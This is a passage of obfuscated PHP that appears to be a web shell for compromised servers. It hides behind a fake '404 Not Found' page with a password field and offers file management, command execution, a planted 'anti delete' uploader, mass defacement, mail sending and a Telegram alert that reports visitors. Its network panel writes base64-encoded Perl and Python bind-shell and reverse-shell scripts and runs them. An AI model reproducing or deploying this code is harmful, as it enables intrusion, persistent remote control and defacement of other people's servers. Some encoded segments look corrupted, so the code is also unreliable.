\x9	\x9<td class='text-center'>{$downer}<gr>/</gr>{$dgrp}</td> 
			<td class='text-center'>"; if (is_writable($path . "/" . $dir)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $dir)) { echo "<rd>"; } echo p($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font></center></td>"; } echo " 
\x9\x9	<td class='text-center'>\xa\x9		<div class='btn-group'>\xa	\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa\x9		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a> 
			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=touch_folder'><i class='bi bi-calendar'></i></a> 
			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa	\x9\x9</div> 
\x9\x9	</td>\xa\x9	</tr>"; } goto PpvmR; IwR8N: goto h1v9W; goto b0Htz; K44qW: goto Nwx3I; goto zN3tu; uba3F: goto ZT_p6; goto UGrJ2; zSsTm: ZW3j1: goto wiQif; nwFWT: n0uKs: goto Ihp18; yhECU: goto IAa_h; goto yd57J; wdhOZ: goto T2So2; goto awheV; IIg7D: goto M9jb2; goto M_Q9a; Fmqk5: sWyZ2: goto deg8m; tdhtT: goto GIn5m; goto CLzcZ; qK5rB: $user_agent = $_SERVER["HTTP_USER_AGENT"]; goto upcq7; FEUrJ: ini_set("memory_limit", "64M"); goto Dc2M6; jD26d: $telegramApiUrl = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}&text=" . urlencode($pesan_alert); goto Mdw2u; EhW21: goto KmDAz; goto NZN8n; uLPNS: $gcc = exe("gcc --version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto jHBVA; q2iNw: @ini_set("output_buffering", 0); goto PlOXp; anA6j: $rib = "http://ip-api.com/json/{$yip}?fields=city"; goto kza90; ezQTk: Rc_RS: goto EfMKN; cOq2q: goto QLr2x; goto bVyWm; k4dIj: zuGew: goto rRCxU; pX8l8: goto pKOtz; goto ljtbs; sC6rm: goto MSTMF; goto AQRwe; qAMhz: goto svZje; goto cNchv; qepCq: yNm8G: goto fVC7V; XGHY4: goto H3mcr; goto UZCd7; zZOvt: sQCPs: goto Lwfik; YZcLH: M3BqJ: goto xcEQS; g85JD: nGILA: goto nxYqg; eavUF: goto Sif0P; goto V13AP; CC7Pb: goto VDEd5; goto QwB_l; rRCxU: if (isset($_7["opn"])) { $file = $_7["opn"]; } goto m_lQ1; EvKXK: wX0Yb: goto D2W59; c6a2h: goto Q8Vdd; goto gCrHD; gCrHD: EXmJN: goto oSuaD; nHank: if ($_7["id"] == "createuploader") { s(); if (isset($_7["bikin"])) { $selectedContent = isset($_7["content"]) ? $_7["content"] : ''; $isiFile = ''; if ($selectedContent == "content1") { $isiFile = "<?php \xa\x9		\x9\x9	ini_set("upload_max_filesize", "100M");  
			\x9\x9	ini_set("post_max_size", "100M"); \xa				\x9	$status = "Error Masse"; \xa\x9		\x9	\x9$cwd = getcwd(); \xa		\x9\x9\x9\x9$leader = $_FILES["ribel"]["size"];  
		\x9\x9	\x9$imam = $_FILES["ribel"]["type"];  
\x9\x9				$ribel = $_FILES["ribel"]["name"];  
	\x9		\x9	$status = "";  
\x9		\x9		if ($ribel != "") {  
					\x9	$cyber = $ribel;  
	\x9	\x9	\x9\x9if (copy($_FILES["ribel"]["tmp_name"], $cyber)) { 	\xa	\x9\x9	\x9\x9	\x9$status = "File Berhasil Diupload Masse: <br>" . $cwd . "/" . $ribel;  
	\x9\x9	\x9\x9	} else { 	\xa		\x9\x9\x9		\x9$status = "Terjadi Kesalahan Saat Mengupload File Masse"; \x9 
\x9\x9\x9			\x9}  
	\x9		\x9\x9} else { 	\xa	\x9	\x9		\x9$status = "Silahkan Pilih Filenya Dulu Masse"; \xa\x9	\x9			}  
	\x9\x9	\x9\x9echo $status; \xa			\x9\x9?><html> 
\x9\x9\x9		<head> 
\x9\x9\x9\x9\x9</head> 
\x9\x9\x9	\x9<body> 
	\x9\x9\x9	<form action="" method="POST" enctype="multipart/form-data"> 
					<input type="file" name="ribel"> 
\x9		\x9	<input type="submit" name="submit" value="Gass Masse"> 
			\x9	</form> 
\x9\x9\x9	\x9</body> 
	\x9		\x9</html>"; } elseif ($selectedContent == "content2") { $isiFile = "<?php \xa\x9		\x9\x9\x9if(isset($_GET["ribel"])) {} \xa		\x9		\x9                ?> \xa\x9\x9			?>"; } $setNama = "upload.php"; $result = file_put_contents($setNama, $isiFile); if ($result !== false) { chmod($setNama, 511); echo "<strong>Create file</strong> ok! <a href="" . $setNama . "?ribel">Click Here!</a> " . ok() . "</div>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "<div class="mb-3"> 
	\x9\x9\x9<u>Create Uploader</u>\xa\x9\x9	\x9<form method="POST" id="defenseShellForm">\xa\x9	\x9\x9	<input type="hidden" name="createhates" value="1"> 
		\x9\x9	<div class="d-grid gap-2"> 
	\x9\x9		\x9<label><input type="radio" name="content" value="content1" checked onclick="toggleShellNameInput(false)"> Uploader Anti Delete</label>\xa	\x9	\x9\x9\x9<label><input type="radio" name="content" value="content2" onclick="toggleShellNameInput(true)"> Normal Uploader pass: ?ribel</label>\xa		\x9	\x9\x9<input class="btn btn-outline-light btn-sm" type="submit" name="bikin" value="create"> 
	\x9\x9	\x9</div>\xa\x9			</form>\xa	\x9\x9</div>"; } goto uBkmK; wjn3q: $location_data = json_decode(file_get_contents($location_api_url), true); goto osecG; b0Htz: WQ2ja: goto TMPU0; gBg7t: gYvHI: goto E26qg; fVC7V: if ($_7["id"] == "phpmailer") { s(); if ($_SERVER["REQUEST_METHOD"] == "POST") { $email_penerima = isset($_POST["email_penerima"]) ? $_POST["email_penerima"] : ''; $subjek = isset($_POST["subjek"]) ? $_POST["subjek"] : ''; $pesan = isset($_POST["pesan"]) ? $_POST["pesan"] : ''; if (filter_var($email_penerima, FILTER_VALIDATE_EMAIL)) { if (@mail($email_penerima, $subjek, $pesan)) { echo "<strong>PHPMailer</strong> Sending! " . ok() . "</div>"; } else { echo "<strong>PHPMailer</strong> failed! " . er() . "</div>"; } } else { echo "<strong>Invalid email address</strong> fail! " . er() . "</div>"; } } echo "\xa			<div class='card card-body text-dark input-group mb-3'>\xa\x9		<u>PHP Mailer</u>\xa\x9	\x9<form method='POST'>\xa\x9\x9\x9	<div class='input-group d-flex gap-2'>\xa	\x9			<label for='email_penerima'>Email Receiver:</label>\xa	\x9	\x9\x9</div>\xa\x9\x9			<div class='input-group'> 
				\x9<input class='form-control form-control-sm' type='email' name='email_penerima' placeholder='Enter the Email' value='[email protected]' required>\xa\x9\x9	\x9</div>\xa\x9	\x9\x9<div class='input-group d-flex gap-2'> 
		\x9		<label for='subjek'>Subject:</label> 
\x9\x9	\x9	</div>\xa\x9\x9	\x9\x9<div class='input-group'> 
\x9\x9		\x9<input class='form-control form-control-sm' type='text' name='subjek' placeholder='Enter the Title' value='Hi Admin' required> 
\x9\x9		</div> 
			\x9<div class='input-group d-flex gap-2'> 
	\x9	\x9\x9<label for='pesan'>Message:</label> 
\x9	\x9\x9\x9</div> 
		\x9\x9	<div class='input-group'> 
				\x9<textarea class='form-control btn-sm' rows='7' name='pesan' placeholder='Message'></textarea> 
\x9\x9\x9\x9</div>\xa\x9\x9		<div class='d-grid gap-2'> 
\x9	\x9\x9	<button type='submit' name='phpmailer' class='btn btn-primary'>Sending</button> 
\x9\x9	\x9</div> 
	\x9	</form> 
\x9	</div>"; } goto O1RqN; O6bjS: aAe5o: goto YDZ81; si1pW: if (isset($_GET["id"]) && $_GET["id"] === "unlockshell") { $newPermissions = 420; changeFilePermissions($filename, $newPermissions); } goto HHFCL; bFGp_: goto gYvHI; goto ugMwL; Pexjf: goto adv1G; goto ZFgRB; bPxnv: goto wX0Yb; goto NcwTG; a61L1: goto aWW6H; goto YZcLH; SLqED: goto PPbbu; goto cKSrB; HJFtS: M9jb2: goto AaGLi; aY1lk: if ($_7["id"] == "network") { s(); echo "\xa		<div class='card text-dark'>\xa\x9		<div class='card-header'> 
\x9		\x9<form method='post'> 
\x9		\x9	<u>Bind port to /bin/sh [Perl]</u><br>\xa\x9	\x9	\x9<u>Port :</u> 
\x9\x9	\x9<div class='input-group'> 
\x9			\x9<input class='form-control btn-sm' type='text' name='port' placeholder='6969'> 
\x9	\x9		<input class='btn btn-dark btn-sm' type='submit' name='bpl' value='submit'>\xa	\x9		</div> 
		\x9<h5>Back-Connect</h5> 
\x9	\x9<u>Server :</u>\xa				<input class='form-control btn-sm' type='text' name='server' placeholder='" . $_SERVER["REMOTE_ADDR"] . "'> 
	\x9	<u>Port :</u> 
\x9	\x9<div class='input-group'>\xa	\x9\x9\x9<input class='form-control btn-sm' type='text' name='port' placeholder='6969'> 
			\x9<select class='form-control btn-sm' name='bc'>\xa	\x9\x9	\x9<option value='perl'>perl</option>\xa	\x9\x9		<option value='python'>python</option>\xa\x9			</select> 
		\x9</div> 
	\x9	<div class='d-grid gap-2'> 
				<input class='btn btn-dark btn-sm btn-block' type='submit' value='submit'> 
\x9	\x9</div>\xa\x9	</form>"; if ($_7["bpl"]) { $bp = $GLOBALS["fungsi"][6]("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpB29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen("bp.pl", "w"); fwrite($brt, $bp); $out = exe("perl bp.pl " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out} 
" . exe("ps aux | grep bp.pl") . "</pre>"; $GLOBALS["fungsi"][4]("bp.pl"); } if ($_7["bc"] == "perl") { $bc = $GLOBALS["fungsi"][6]("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen("bc.pl", "w"); fwrite($plbc, $bc); $out = exe("perl bc.pl " . $_7["server"] . " " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}\xa" . exe("ps aux | grep bc.pl") . "</pre>"; $GLOBALS["fungsi"][4]("bc.pl"); } if ($_7["bc"] == "python") { $bc_py = $GLOBALS["fungsi"][6]("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen("bcpy.py", "w"); fwrite($pbc_py, $bc_py); $out_py = exe("python bcpy.py " . $_7["server"] . " " . $_7["port"]); sleep(1); echo "<pre>{$out_py}\xa" . exe("ps aux | grep bcpy.py") . "</pre>"; $GLOBALS["fungsi"][4]("bcpy.py"); } echo "</div> 
\x9\x9\x9</div>\xa	\x9<br/>"; } goto SLqED; pNXU3: lsV5N: goto Xtayd; crGb4: vQdCF: goto I8XLB; c9WMJ: PkFhD: goto H5uEs; Cx1VN: eBqeZ: goto YdWhL; wiQif: @ini_set("max_execution_time", 0); goto Msa02; ifDbP: rPurp: goto QHPqJ; huEAZ: goto D4Dlr; goto aWagg; yPJ0y: goto DB5uf; goto CChkk; jHBVA: goto rGIHh; goto jfWwD; cKh9k: bsBAb: goto zBHc0; S6NOq: ini_set("display_errors", FALSE); goto ptoEg; t_mQ0: if (!isset($_SESSION["forbidden"])) { ?>  
<!doctypehtml><html><head><title>404 Not Found.</title><meta content="noindex, nofollow, noarchive"name="robots"><meta content="#FFFFFF"name="theme color"></head><style>body{background-image:url(#);background-repeat:no-repeat;background-size:cover;background-position:center;height:100vh;margin:0;display:flex;flex-direction:column;justify-content:center;align-items:center;background-color:#fff}h1{color:#fff}img{opacity:.5;width:200px;height:300px}form{text-align:center;margin-top:20px}input[type=password]{padding:5px}input[type=submit]{background-color:#fff;color:#fff;border:none;padding:5px 10px;cursor:pointer}</style><body><form method="post"><input name="pass"required style="border:none"type="password"></form></body></html><?php  die; } goto TTnxI; QKxFT: foreach ($scand as $file) { $ft = date("d-m-Y G:i", filemtime("{$path}/{$file}")); if ($GLOBALS["fungsi"][5]("posix_getpwuid")) { $fowner = @posix_getpwuid(fileowner("{$path}/{$file}")); $fowner = $fowner["name"]; } else { $fowner = fileowner("{$path}/{$file}"); } if ($GLOBALS["fungsi"][5]("posix_getgrgid")) { $fgrp = @posix_getgrgid(filegroup("{$path}/{$file}")); $fgrp = $fgrp["name"]; } else { $fgrp = filegroup("{$path}/{$file}"); } if (!$fungsi[3]($path . "/" . $file)) { continue; } if (strlen($file) > 50) { $_f = substr($file, 0, 50) . "...-." . $ext; } else { $_f = $file; } echo " 
	\x9<tr> 
	\x9<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$file}'>{$_f}</a></td>\xa\x9	\x9<td class='text-center'>file</td>\xa\x9\x9	<td class='text-center'>{$ft}</td> 
\x9\x9	<td class='text-center'>" . sz(filesize($file)) . "</td>\xa		\x9<td class='text-center'>{$fowner}<gr>/</gr>{$fgrp}</td>\xa			<td class='text-center'>"; if (is_writable($path . "/" . $file)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $file)) { echo "<rd>"; } echo p($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</gr></rd></td>"; } echo "\xa	\x9\x9<td class='text-center'>\xa\x9	\x9<div class='btn-group'> 
	\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a> 
	\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa				<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a> 
\x9		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a> 
\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa\x9\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa	\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>\xa			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>\xa			</div>\xa		\x9</td>\xa		</tr>"; } goto pdGjy; fAhFZ: goto sQCPs; goto ak3P1; QHPqJ: function er() { echo "<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto JaGks; jr_tH: goto EXmJN; goto bkUmP; AQRwe: SwU8B: goto axLKv; UGrJ2: Czge0: goto rJiQh; hy3Yx: iYskO: goto SleZJ; ddOT6: @ini_set("display_errors", 0); goto iLBez; iYc1l: hKE8D: goto K0Vz2; iaUZl: ZT39K: goto EvNBJ; E26qg: if ($_7["id"] == "upload") { s(); if (isset($_7["upl"])) { $result = count($_FILES["file"]["name"]); for ($contents = 0; $contents < $result; $contents++) { $namefile = $_FILES["file"]["name"][$contents]; $up = @copy($_FILES["file"]["tmp_name"][$contents], "{$path}/" . $namefile); } if ($result < 2) { if ($up) { echo "<strong>Upload</strong> {$namefile} ok! " . ok() . "</div>"; } else { echo "<strong>Upload</strong> fail! " . er() . "</div>"; } } else { echo "<strong>Upload</strong> {$result} ok! " . ok() . "</div>"; } } echo " 
\x9	<div class='card card-body text-dark input-group mb-3'>\xa		<u>Multiple upload</u> 
\x9	\x9<form method='POST' enctype='multipart/form-data'>\xa\x9		\x9<div class='input-group'>\xa	\x9\x9\x9	<input class='form-control form-control-sm' type='file' name='file[]' multiple='' {$_r}>\xa	\x9	\x9	<input class='btn btn-dark btn-sm' type='submit' name='upl' value='upload'> 
		\x9\x9</div> 
		\x9</form>\xa\x9	</div>"; } goto yPJ0y; xA8V1: function exe_root($set, $sad) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/" . $xx . "/i", $set)) { $set = $set . " " . $xx; } $a = $GLOBALS["fungsi"][5]; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink, $sad); return $d($pink[1]); } else { return "proc_open function is disabled !"; } } goto jr_tH; jGADS: goto Rc_RS; goto AT4g5; yn2Tx: XB8uL: goto ddOT6; NMZxF: goto yNm8G; goto J7c2r; lC6t8: T0L1a: goto S6NOq; UTVEK: kfJtT: goto j0wib; ZuNbg: nWNfK: goto F6gvW; D6fdE: W60P5: goto AfB8N; QbLd2: HdaTq: goto pIeXA; a3uB9: if (isset($_GET["id"]) && $_GET["id"] === "root_folders") { $newFolderPermissions = 493; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } goto SH3ma; ttsjz: if ($_7["action"] == "unzip_file") { s(); if ($_7["yeahx"]) { $zipFile = $file; $extractTo = $GLOBALS["fungsi"][7](); $zip = new ZipArchive(); if ($zip->open($zipFile) === true) { $zip->extractTo($extractTo); $zip->close(); echo "<strong>Unzip file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Unzip file</strong> fail! " . er() . "</div>"; } } echo "\xa\x9\x9<div class='btn-group mb-3'> 
	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a> 
		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a> 
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a> 
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a> 
\x9	</div>\xa\x9\x9<div class='card card-body text-dark input-group mb-3'> 
	\x9	<p>Are you sure to unzip : " . basename($file) . " ?</p> 
	\x9	<form method='POST'> 
\x9			<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a> 
\x9\x9\x9\x9<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> 
		\x9</form>\xa\x9\x9</div>"; } goto NqgrS; SH6LF: D4Dlr: goto kPsi7; yWSnK: Nwx3I: goto YnPrN; T223U: goto sWyZ2; goto M3aA3; ONGIi: fGDY0: goto KfMrU; Iu50C: goto QtYOL; goto C9c37; rJiQh: $pl = exe("perl --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto NIMXe; t03jb: $filename = __FILE__; goto K44qW; axLKv: function w($dir, $perm) { if (!is_writable($dir)) { return "<rd>" . $perm . "</rd>"; } else { return "<gr>" . $perm . "</gr>"; } } goto W916h; kKDOw: goto IVobD; goto ZrHOp; Rm5Ns: goto s_cq9; goto Njg7s; NqgrS: goto hKE8D; goto Z2Byx; nc1Ay: goto eBqeZ; goto KyHu0; nwitw: if (isset($_7["dir"])) { $dir = unhex($_7["dir"]); chdir($dir); } else { $dir = hex($gcw()); } goto emyW3; osP09: goto RWaoe; goto US9Ue; MFdHq: $path = str_replace("\", "/", $path); goto HlE6K; XtGrk: u21ap: goto PyOJP; PPrH1: if (isset($_7["r_f"])) { $old = $file; $new = $_7["new_name"]; rename($new, $old); if (file_exists($new)) { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert"> 
	\x9\x9<strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\xa		</div>"; } else { if (rename($old, $new)) { echo "<strong>Rename file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Rename file</strong> fail! " . er() . "</div>"; } } } goto p0Xma; ptoEg: goto Rl8Ii; goto V8psl; EoJs0: if ($_7["id"] == "deface") { function mass_all($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { $fungsi[2]($, $contents_sc); } elseif ($dirb === "..") { $fungsi[2]($, $contents_sc); } else { if ($fungsi[1]($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$}<br>"; $fungsi[2]($, $contents_sc); $ = mass_all($dirc, $namefile, $contents_sc); } } } } } } function mass_onedir($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { $fungsi[2]($, $contents_sc); } elseif ($dirb === "..") { $fungsi[2]($, $contents_sc); } else { if ($fungsi[1]($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$dirb}/{$namefile}<br>"; $fungsi[2]($, $contents_sc); } } } } } } if ($_7["start"]) { if ($_7["tipe"] == "mass") { mass_all($_7["d_dir"], $_7["d_file"], $_7["script"]); } elseif ($_7["tipe"] == "onedir") { mass_onedir($_7["d_dir"], $_7["d_file"], $_7["script"]); } } s(); echo "\xa\x9\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9	<u>Mass Deface</u> 
\x9\x9\x9<form method='POST'> Tipe:\xa		\x9<div class='form-check'> 
		\x9	<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>\xa\x9		\x9<label class='form-check-label' for='flexCheckDefault'>One dir</label> 
\x9	\x9</div>\xa\x9		<div class='form-check'>\xa\x9\x9\x9	<input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'> 
\x9		\x9<label class='form-check-label' for='flexCheckDefault'>All directory</label> 
	\x9\x9</div> 
		\x9	<i class='bi bi-folder'></i> Directory: 
\x9	\x9	<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'> 
	\x9\x9\x9<i class='bi bi-file-earmark'></i> Filename:\xa		\x9	<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename'>\xa		\x9\x9<i class='bi bi-file-earmark'></i> Your script:\xa				<textarea class='form-control btn-sm' rows='7' name='script' placeholder='your script'></textarea> 
\x9\x9		<div class='d-grid gap-2'> 
	\x9	\x9<input class='btn btn-dark btn-sm'type='submit' name='start' value='deface'>\xa\x9\x9	\x9</div> 
	\x9\x9</form> 
	\x9</div>"; } goto Rm5Ns; pdGjy: goto kAEUT; goto uxESJ; nO2y6: goto e0LVC; goto zSsTm; H0PkX: goto OY_it; goto hy3Yx; fgATR: goto K2OD0; goto oUC3I; uBkmK: goto Cw7TO; goto ld3Ay; eWOz0: if ($_7["id"] == "searchbyEXT") { function search_by_extension($dir, $extensi, $sort_by_date = false) { $result = array(); if (is_readable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; if ($dirb === "." || $dirb === "..") { continue; } if (is_dir($dirc)) { $result = array_merge($result, search_by_extension($dirc, $extensi, $sort_by_date)); } else { $fileExt = pathinfo($dirb, PATHINFO_EXTENSION); if (strcasecmp($fileExt, $extensi) === 0) { $result[] = $dirc; } } } } if ($sort_by_date) { usort($result, function ($a, $b) { return filemtime($b) - filemtime($a); }); } return $result; } if ($_7["start"]) { $dir = $_7["d_dir"]; $extensi = ltrim($_7["extensi"], "."); $sort_by_date = isset($_7["sort_by_date"]) && $_7["sort_by_date"] == "on"; $search_results = search_by_extension($dir, $extensi, $sort_by_date); if (!empty($search_results)) { echo "<div class='alert alert-info'>Results for extension {$extensi} in directory {$dir}:</div>"; foreach ($search_results as $file) { $fileDate = date("Y-m-d H:i:s", filemtime($file)); echo "<div class='alert alert-success'>{$fileDate} - {$file}</div>"; } } else { echo "<div class='alert alert-warning'>No files with extension {$extensi} found in directory {$dir}.</div>"; } } s(); echo "\xa\x9\x9\x9<div class='card card-body text-dark input-group mb-3'> 
		\x9<u>Search By EXT</u> 
			\x9<form method='POST'> 
	\x9\x9\x9<div class='input-group d-flex gap-2'>\xa\x9			\x9<i class='bi bi-folder'></i> Directory: 
	\x9\x9	\x9</div> 
			\x9\x9<div class='input-group'> 
